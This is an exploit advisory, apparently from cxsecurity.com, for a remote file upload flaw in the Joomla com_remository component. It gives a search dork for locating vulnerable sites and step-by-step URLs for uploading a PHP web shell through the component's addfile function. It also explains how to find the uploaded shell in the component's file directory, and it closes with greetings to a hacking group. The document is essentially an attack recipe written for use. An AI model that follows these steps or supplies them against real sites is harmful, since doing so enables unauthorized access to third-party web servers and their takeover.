Joomla com_remository Remote Upload File

Published
Credit
Risk
2017.01.03
K33P-S1L3NT
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:"index.php?com_remository"


################# E X P L O I T ###################


1. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile

2. Add your php file , example : shell.php

3. http://www.Target.com/components/com_remository_files/ <= Directory Folder

4. If web server alowe to see directory you can see folder example : file_image_1

5. You can find your shell in lates file_image_[latest Number]

6. Example URL : http://www.example.com/components/com_remository_files/file_image_1/12761347shell.php


Grets : Overload Team | Admiral | i.am_geek | MR.LEGEND | 1!0N7!N | s1pUT | zbyte | Badaki | Indonesia People

References:

https://www.facebook.com/loading.gov


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com